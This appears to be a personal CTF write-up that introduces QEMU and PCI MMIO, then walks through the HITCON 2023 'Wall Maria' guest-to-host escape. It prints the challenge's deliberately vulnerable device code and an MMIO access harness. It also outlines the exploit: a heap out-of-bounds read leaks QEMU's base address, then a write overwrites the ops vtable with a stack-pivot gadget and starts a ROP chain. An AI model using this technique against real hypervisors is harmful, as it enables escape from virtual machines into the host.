# QEMU learning

## What is QEMU?

QEMU (Quick Emulator) is an open-source emulator. It can work together with KVM (Kernel-based Virtual Machine), and it is also used to run applications compiled for one architecture (e.g. arm) on another architecture (e.g. x86_64).

## Setup QEMU

Download

```bash
wget https://download.qemu.org/qemu-8.0.2.tar.xz
tar xvJf qemu-8.0.2.tar.xz
```

Install dependencies

```bash
sudo pip3 install ninja
sudo apt install libglib2.0-dev libgcrypt20-dev zlib1g-dev autoconf automake libtool bison flex libpixman-1-dev
```

Build

```shell
cd qemu-8.0.2
./configure --enable-debug && cd build && make -j`nproc`
```

## PCI devices

Learn how to write a custom PCI device: https://www.youtube.com/watch?v=MTUuymrutNw

```sh
./qemu-system-x86_64 -device help | grep "PCI"
name "cxl-downstream", bus PCI, desc "CXL Switch Downstream Port"
name "cxl-rp", bus PCI, desc "CXL Root Port"
name "cxl-upstream", bus PCI, desc "CXL Switch Upstream Port"
name "i82801b11-bridge", bus PCI
name "ioh3420", bus PCI, desc "Intel IOH device id 3420 PCIE Root Port"
name "pci-bridge", bus PCI, desc "Standard PCI Bridge"
name "pci-bridge-seat", bus PCI, desc "Standard PCI Bridge (multiseat)"
name "pcie-pci-bridge", bus PCI
name "pcie-root-port", bus PCI, desc "PCI Express Root Port"
name "pxb", bus PCI, desc "PCI Expander Bridge"
name "pxb-cxl", bus PCI, desc "CXL Host Bridge"
name "pxb-pcie", bus PCI, desc "PCI Express Expander Bridge"
name "vfio-pci-igd-lpc-bridge", bus PCI, desc "VFIO dummy ISA/LPC bridge for IGD assignment"
name "x3130-upstream", bus PCI, desc "TI X3130 Upstream Port of PCI Express Switch"
name "xio3130-downstream", bus PCI, desc "TI X3130 Downstream Port of PCI Express Switch"
name "ich9-usb-ehci1", bus PCI
name "ich9-usb-ehci2", bus PCI
name "ich9-usb-uhci1", bus PCI
name "ich9-usb-uhci2", bus PCI
name "ich9-usb-uhci3", bus PCI
name "ich9-usb-uhci4", bus PCI
name "ich9-usb-uhci5", bus PCI
name "ich9-usb-uhci6", bus PCI
name "nec-usb-xhci", bus PCI
name "pci-ohci", bus PCI, desc "Apple USB 
Controller"
name "piix3-usb-uhci", bus PCI
name "piix4-usb-uhci", bus PCI
name "qemu-xhci", bus PCI
name "usb-ehci", bus PCI
name "am53c974", bus PCI, desc "AMD Am53c974 PCscsi-PCI SCSI adapter"
name "cxl-type3", bus PCI, desc "CXL PMEM Device (Type 3)"
name "dc390", bus PCI, desc "Tekram DC-390 SCSI adapter"
name "ich9-ahci", bus PCI, alias "ahci"
name "lsi53c810", bus PCI
name "lsi53c895a", bus PCI, alias "lsi"
name "megasas", bus PCI, desc "LSI MegaRAID SAS 1078"
name "megasas-gen2", bus PCI, desc "LSI MegaRAID SAS 2108"
name "mptsas1068", bus PCI, desc "LSI SAS 1068"
name "nvme", bus PCI, desc "Non-Volatile Memory Express"
name "piix3-ide", bus PCI
name "piix4-ide", bus PCI
name "pvscsi", bus PCI
name "sdhci-pci", bus PCI
name "vhost-scsi-pci", bus PCI
name "vhost-scsi-pci-non-transitional", bus PCI
name "vhost-scsi-pci-transitional", bus PCI
name "vhost-user-blk-pci", bus PCI
name "vhost-user-blk-pci-non-transitional", bus PCI
name "vhost-user-blk-pci-transitional", bus PCI
name "vhost-user-fs-pci", bus PCI
name "vhost-user-scsi-pci", bus PCI
name "vhost-user-scsi-pci-non-transitional", bus PCI
name "vhost-user-scsi-pci-transitional", bus PCI
```

Listing the devices of a given qemu build, we can see lots of PCI devices. If you need additional information, check [PCI](https://en.wikipedia.org/wiki/Conventional_PCI).

Basically, PCI is a local bus for attaching hardware devices, and emulated PCI devices are how a hypervisor gives new features to the guest. We can interact with PCI devices using 2 methods:

- MMIO (Memory-mapped I/O)
- PMIO (Port-mapped I/O)

With MMIO, we can use ordinary assembly instructions like `mov` to communicate with the device (and therefore with the host), while `PMIO` uses the dedicated `in`/`out` instructions. In this post we will mainly use `MMIO` as a means of communication.
```sh
00:00.0 Host bridge: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX Host bridge (rev 01)
00:01.0 PCI bridge: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX AGP bridge (rev 01)
00:07.0 ISA bridge: Intel Corporation 82371AB/EB/MB PIIX4 ISA (rev 08)
00:07.1 IDE interface: Intel Corporation 82371AB/EB/MB PIIX4 IDE (rev 01)
00:07.3 Bridge: Intel Corporation 82371AB/EB/MB PIIX4 ACPI (rev 08)
00:07.7 System peripheral: VMware Virtual Machine Communication Interface (rev 10)
00:0f.0 VGA compatible controller: VMware SVGA II Adapter
00:10.0 SCSI storage controller: Broadcom / LSI 53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI (rev 01)
00:11.0 PCI bridge: VMware PCI bridge (rev 02)
00:15.0 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.1 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.2 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.3 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.4 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.5 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.6 PCI bridge: VMware PCI Express Root Port (rev 01)
00:15.7 PCI bridge: VMware PCI Express Root Port (rev 01)
00:16.0 PCI bridge: VMware PCI Express Root Port (rev 01)
```

In many hypervisor escapes (`QEMU`, `VMware`, `VirtualBox`), we will principally take advantage of those PCI devices to achieve a guest-to-host escape.

## Memory API

https://www.qemu.org/docs/master/devel/memory.html

The memory-mapped region of a `qemu` device is initialized using [memory_region_init_io](https://elixir.bootlin.com/qemu/v8.0.2/source/softmmu/memory.c#L1530).

`hwaddr` is a special data type: it is the type of a physical address in this address space, which is divided into pages.
https://android.googlesource.com/platform/external/qemu.git/+/master/docs/QEMU-MEMORY-MANAGEMENT.TXT

This allows qemu to perform I/O operations from guest to host and vice versa.

## HITCON 2023 - Wall Maria

First, check how qemu is launched. I modified `run.sh` a little to run it locally:

```bash
#!/bin/bash

./qemu-system-x86_64 \
    -L ./bios \
    -kernel ./bzImage \
    -initrd ./initramfs.cpio.gz \
    -cpu kvm64,+smep,+smap \
    -monitor none \
    -m 1024M \
    -monitor /dev/null \
    -append "console=ttyS0 oops=panic panic=1 quiet nokpti nokaslr" \
    -nographic \
    -no-reboot \
    -net user -net nic -device e1000 \
    -device maria \
    -enable-kvm \
    -s
```

You should get familiar with kernel debugging first, because it serves as the fundamental background for understanding virtualization. Check [this blog](https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/) for that.

As in Linux kernel exploitation, we are given a bash script to run a kernel emulated by `qemu`. Some options that you should pay attention to:

- `-L bios` specifies the directory for `BIOS`, `VGA-bios` and `keymaps`.
- `-initrd initramfs.cpio.gz` specifies the compressed file system including the root directory.
- `-enable-kvm` accelerates `QEMU` by allowing usage of `kvm` from the host.
- `-device maria` adds the custom `maria` device to the emulated machine.
- `-s` makes `QEMU` open a gdbserver on TCP port 1234 (shorthand for `-gdb tcp::1234`), so we can attach gdb to it if we want to debug the kernel.

More information about kvm

If you want to enable kvm on VMware, do as in the following picture:

![image](https://hackmd.io/_uploads/SyB7avUgR.png)

Then, disable Hyper-V by running `bcdedit /set hypervisorlaunchtype off` in PowerShell with admin privileges, then reboot.

If you use WSL, you can enable `nested virtualization`, check [this site](https://serverfault.com/questions/1043441/how-to-run-kvm-nested-in-wsl2-or-vmware).

If successful, `/dev/kvm` will exist and you can use the command `kvm-ok` to check the status of kvm.
![image](https://hackmd.io/_uploads/H1qBudLe0.png)

**Source code**

```c
#include "hw/hw.h"
#include "hw/pci/msi.h"
#include "hw/pci/pci.h"
#include "qapi/visitor.h"
#include "qemu/main-loop.h"
#include "qemu/module.h"
#include "qemu/osdep.h"
#include "qom/object.h"

#define TYPE_PCI_MARIA_DEVICE "maria"
#define MARIA_MMIO_SIZE 0x10000

#define BUFF_SIZE 0x2000

typedef struct {
    PCIDevice pdev;
    struct {
        uint64_t src;
        uint8_t off;
    } state;
    char buff[BUFF_SIZE];
    MemoryRegion mmio;
} MariaState;

DECLARE_INSTANCE_CHECKER(MariaState, MARIA, TYPE_PCI_MARIA_DEVICE)

static uint64_t maria_mmio_read(void *opaque, hwaddr addr, unsigned size) {
    MariaState *maria = (MariaState *)opaque;
    uint64_t val = 0;
    switch (addr) {
        case 0x00:
            cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 1);
            val = 0x600DC0DE;
            break;
        case 0x04:
            val = maria->state.src;
            break;
        case 0x08:
            val = maria->state.off;
            break;
        default:
            val = 0xDEADC0DE;
            break;
    }
    return val;
}

static void maria_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) {
    MariaState *maria = (MariaState *)opaque;
    switch (addr) {
        case 0x00:
            cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 0);
            break;
        case 0x04:
            maria->state.src = val;
            break;
        case 0x08:
            maria->state.off = val;
            break;
        default:
            break;
    }
}

static const MemoryRegionOps maria_mmio_ops = {
    .read = maria_mmio_read,
    .write = maria_mmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
    .valid = {
        .min_access_size = 4,
        .max_access_size = 4,
    },
    .impl = {
        .min_access_size = 4,
        .max_access_size = 4,
    },
};

static void pci_maria_realize(PCIDevice *pdev, Error **errp) {
    MariaState *maria = MARIA(pdev);
    memory_region_init_io(&maria->mmio, OBJECT(maria), &maria_mmio_ops, maria, "maria-mmio", MARIA_MMIO_SIZE);
    pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &maria->mmio);
}

static void maria_instance_init(Object *obj) {
    MariaState *maria = MARIA(obj);
    memset(&maria->state, 0, sizeof(maria->state));
    memset(maria->buff, 0, sizeof(maria->buff));
}

static void maria_class_init(ObjectClass *class, void *data) {
    DeviceClass *dc = DEVICE_CLASS(class);
    PCIDeviceClass *k = PCI_DEVICE_CLASS(class);

    k->realize = pci_maria_realize;
    k->vendor_id = PCI_VENDOR_ID_QEMU;
    k->device_id = 0xDEAD;
    k->revision = 0x0;
    k->class_id = PCI_CLASS_OTHERS;

    set_bit(DEVICE_CATEGORY_MISC, dc->categories);
}

static void pci_maria_register_types(void) {
    static InterfaceInfo interfaces[] = {
        { INTERFACE_CONVENTIONAL_PCI_DEVICE },
        { },
    };
    static const TypeInfo maria_info = {
        .name = TYPE_PCI_MARIA_DEVICE,
        .parent = TYPE_PCI_DEVICE,
        .instance_size = sizeof(MariaState),
        .instance_init = maria_instance_init,
        .class_init = maria_class_init,
        .interfaces = interfaces,
    };

    type_register_static(&maria_info);
}

type_init(pci_maria_register_types)
```

In qemu escape challenges, as in some CVEs related to `VirtualBox` and `VMware`, our target is to exploit a vulnerable device that is compiled into `QEMU`. These could be VGA devices, network cards, disk controllers, and so on.

A custom device called `maria` is implemented, so let's dig deeper and figure out the bug.

![image](https://hackmd.io/_uploads/BJ1niyweA.png)

You can check the device `maria` by using `lspci` in the given kernel.

![image](https://hackmd.io/_uploads/BJPQP0Le0.png)

So which one is the `maria` device? Check these lines, then read the source code of `QEMU`:

```c
k->vendor_id = PCI_VENDOR_ID_QEMU;
k->device_id = 0xDEAD;
```

`PCI_VENDOR_ID_QEMU` is defined as `0x1234` in the `QEMU` source, so the device shows up with the ID `1234:dead`. That means the last line in the output is the `maria` device.

![image](https://hackmd.io/_uploads/S1iUVyDlC.png)

Information about the `maria` device is stored in the directory `/sys/devices/pci0000:00/0000:00:05.0`.

![image](https://hackmd.io/_uploads/S1RT41veC.png)

To interact with the device, we will focus on the files named `resourceX` (X >= 0). Each one corresponds to a BAR of the device, and since `maria` registers its MMIO region as BAR 0, the file we want is `resource0`.

![image](https://hackmd.io/_uploads/BJ4sBkPeC.png)

If we try to `cat` or `echo`, it would fail.
Instead of using traditional I/O, we can use `mmap` for these `sysfs` resources.

```c
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>

#define PAGE_SIZE 0x1000

static volatile uint8_t *mmio_mem;

static void errExit(const char *msg) {
    perror(msg);
    exit(EXIT_FAILURE);
}

uint32_t mmio_read(uint32_t addr) {
    return *(volatile uint32_t *)(mmio_mem + addr);
}

void mmio_write(uint32_t addr, uint32_t val) {
    *(volatile uint32_t *)(mmio_mem + addr) = val;
}

int main() {
    int fd = open("/sys/devices/pci0000:00/0000:00:05.0/resource0", O_RDWR | O_SYNC);
    if (fd < 0) {
        errExit("Open /sys/devices/pci0000:00/0000:00:05.0/resource0 failed");
    }
    mmio_mem = mmap(NULL, PAGE_SIZE * 4, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (mmio_mem == MAP_FAILED) {
        errExit("mmap");
    }
    mmio_read(0);
}
```

Why do we need the `O_SYNC` flag in `open`?

The intent is to make sure that accesses to the memory-mapped region are not cached or delayed, so that every read and write reaches the underlying device right away. See the discussion below for when the flag actually has an effect.

https://stackoverflow.com/questions/72115837/when-does-o-sync-have-an-effect

### BUG

```c
static uint64_t maria_mmio_read(void *opaque, hwaddr addr, unsigned size) {
    MariaState *maria = (MariaState *)opaque;
    uint64_t val = 0;
    switch (addr) {
        case 0x00:
            cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 1);
            val = 0x600DC0DE;
            break;
        case 0x04:
            val = maria->state.src;
            break;
        case 0x08:
            val = maria->state.off;
            break;
        default:
            val = 0xDEADC0DE;
            break;
    }
    return val;
}

static void maria_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size) {
    MariaState *maria = (MariaState *)opaque;
    switch (addr) {
        case 0x00:
            cpu_physical_memory_rw(maria->state.src, &maria->buff[maria->state.off], BUFF_SIZE, 0);
            break;
        case 0x04:
            maria->state.src = val;
            break;
        case 0x08:
            maria->state.off = val;
            break;
        default:
            break;
    }
}
```

```c
typedef struct {
    PCIDevice pdev;
    struct {
        uint64_t src;
        uint8_t off;
    } state;
    char buff[BUFF_SIZE];
    MemoryRegion mmio;
} MariaState;
```

`cpu_physical_memory_rw` is a special function that works like `memcpy`, but which of its first two arguments (`rdi` or `rsi`) is the source and which is the destination depends on the 4th param, `is_write`. Its first param is a guest physical address, not a virtual address, and its second param is a buffer in the memory of the `QEMU` process. With `is_write = 1` the buffer is copied into guest physical memory (this is what `maria_mmio_read` does), and with `is_write = 0` guest physical memory is copied into the buffer (this is what `maria_mmio_write` does).
To know more about physical addresses and virtual addresses, you can see [GVA and GPA](https://www.geeksforgeeks.org/memory-allocation-techniques-mapping-virtual-addresses-to-physical-addresses/).

Indeed, we cannot hand the device a virtual address; it only understands a `hardware address`, or `hwaddr`.

The 3rd param, which is `BUFF_SIZE`, is fixed and equal to the size of `buff`. Since `maria->state.off` is never checked, any nonzero value leads to an `oob read/write` of up to 255 bytes past `buff` (`off` is a `uint8_t`), in both the `read` and the `write` function.

**Note: We are exploiting a single userland program (the `QEMU` process), so being accustomed to pwning userland binaries is definitely a prerequisite. We will write the exploit in C, which is harder than using python.**

### OOB Read/Write

First, I need to hit the breakpoints in `maria_mmio_read` and `maria_mmio_write`.

```c
mmio_write(0x0, 0x0);
```

![image](https://hackmd.io/_uploads/HJubnkwxC.png)

Breakpoint hit! Let's check what we can leverage.

```sh
pwndbg> ptype /o maria
type = struct {
/*      0      |    2592 */    PCIDevice pdev;
/*   2592      |      16 */    struct {
/*   2592      |       8 */        uint64_t src;
/*   2600      |       1 */        uint8_t off;
/* XXX  7-byte padding   */

                                   /* total size (bytes):   16 */
                               } state;
/*   2608      |    8192 */    char buff[8192];
/*  10800      |     272 */    MemoryRegion mmio;

                               /* total size (bytes): 11072 */
                             } *
```

#### OOB Read

The copy starts at `&buff[off]` and always covers `0x2000` bytes, so with a nonzero `off` it runs past the end of `buff[8192]`, and right after `buff` there is `MemoryRegion mmio`.

[MemoryRegion definition](https://elixir.bootlin.com/qemu/v8.0.2/source/include/exec/memory.h#L753)

![image](https://hackmd.io/_uploads/ByE3nkPeA.png)

![image](https://hackmd.io/_uploads/BJfza1wg0.png)

The address highlighted in blue is on the `heap`, where the `MariaState` struct lives, while the ones highlighted in red and white are addresses inside the qemu binary, from which we get the qemu base address.

Leaking the qemu base address is ez, so let's find out how to write.
#### OOB Write

```c
static const MemoryRegionOps maria_mmio_ops = {
    .read = maria_mmio_read,
    .write = maria_mmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
    .valid = {
        .min_access_size = 4,
        .max_access_size = 4,
    },
    .impl = {
        .min_access_size = 4,
        .max_access_size = 4,
    },
};
```

![image](https://hackmd.io/_uploads/HJxkRkvxR.png)

As the `sandbox` is enabled, `fork` and `execve` are both blacklisted, so we cannot simply spawn a shell.

`maria_mmio_ops` works like a vtable of function pointers: whenever we access the memory-mapped region, `QEMU` dispatches through these function pointers. So instead of letting it call the original handlers, we replace a pointer with our `stack pivot` gadget.

Also, because `opaque` is stored in `rax` when it jumps into the handler, this gadget is a perfect fit:

```
0x00000000007bce54 : push rax ; pop rsp ; nop ; pop rbp ; ret
```

From here, we can build an `orw` (open/read/write) payload, or `ROP` to `mprotect` and jump to our shellcode.

### Exploit

First set the offset to 0xf0, then read some stuff behind `buff`:

```c
void set_off(uint32_t value) {
    mmio_write(0x08, value);
}

set_off(0xf0);
```

Then, set `src` to the physical address of a buffer that we allocated with `mmap`, so that the device's `read` and `write` handlers copy to and from it.

To find the physical address of an arbitrary virtual address, open the pagemap file and `lseek` to the entry of that address.

https://www.kernel.org/doc/Documentation/vm/pagemap.txt

http://www.phrack.org/issues/70/5.html

### Another problem?

`char buff[0x2000]` is larger than the page size, which is only 0x1000. So a problem occurs here.

If we `mmap` a region with a size of `0x2000`, its two virtual pages can be backed by two unrelated physical pages. The device copies `0x2000` bytes starting from one physical address, so our buffer would be wrong if the pages are not physically consecutive.
**How to deal with this?**

```
/root # cat /proc/meminfo
MemTotal:         992864 kB
MemFree:          897008 kB
MemAvailable:     892184 kB
Buffers:               0 kB
Cached:            72104 kB
SwapCached:            0 kB
Active:            11372 kB
Inactive:          61200 kB
Active(anon):      11372 kB
Inactive(anon):    61200 kB
Active(file):          0 kB
Inactive(file):        0 kB
Unevictable:           0 kB
Mlocked:               0 kB
SwapTotal:             0 kB
SwapFree:              0 kB
Dirty:                 0 kB
Writeback:             0 kB
AnonPages:           492 kB
Mapped:             1908 kB
Shmem:             72104 kB
KReclaimable:       9328 kB
Slab:              15576 kB
SReclaimable:       9328 kB
SUnreclaim:         6248 kB
KernelStack:         732 kB
PageTables:          156 kB
SecPageTables:         0 kB
NFS_Unstable:          0 kB
Bounce:                0 kB
WritebackTmp:          0 kB
CommitLimit:      496432 kB
Committed_AS:      73608 kB
VmallocTotal:   34359738367 kB
VmallocUsed:         980 kB
VmallocChunk:          0 kB
Percpu:              228 kB
HugePages_Total:       0
HugePages_Free:        0
HugePages_Rsvd:        0
HugePages_Surp:        0
Hugepagesize:       2048 kB
Hugetlb:               0 kB
DirectMap4k:       20352 kB
DirectMap2M:     1028096 kB
/root #
```

We have two ways:

- Allocate multiple pages, then find the physical address of each page to see if any of them are consecutive.
- Set hugepages.

Hugepages allow the system to manage memory in large blocks (2048 kB here, see `Hugepagesize` above), so a `0x2000`-byte buffer inside one hugepage is physically contiguous. `HugePages_Total` is 0 by default, so we have to modify the number of hugepages in the system first.

https://infohub.delltechnologies.com/en-US/l/day-two-best-practices-10/red-hat-enterprise-linux-hugepages-2/

```bash
sysctl -w vm.nr_hugepages=40
```

After leaking, overwrite `mmio_ops` and `opaque` with our crafted vtable pointers and our ROP chain, respectively.

**Before**

![image](https://hackmd.io/_uploads/rkYtSxDeA.png)

**After**

![image](https://hackmd.io/_uploads/SkHTrxPeA.png)

![image](https://hackmd.io/_uploads/HyA0Bevg0.png)

![image](https://hackmd.io/_uploads/H1sgUgPx0.png)

### Summary

A baby qemu escape challenge that got me interested in reading a great amount of shitty code. I learned a lot about how to interact with PCI devices and exploit them, and hopefully I will grasp more about networking and VGA cards next.
## Reference

- https://elixir.bootlin.com/qemu/v8.0.2/source
- https://airbus-seclab.github.io/qemu_blog/pci.html
- https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/09/03/kvm-mmio
- https://www.qemu.org/docs/master/devel/memory.html
- https://burgers.io/pci-access-without-a-driver
- https://kb.vmware.com/s/article/2057914
- https://www.kernel.org/doc/Documentation/vm/pagemap.txt
- http://www.phrack.org/issues/70/5.html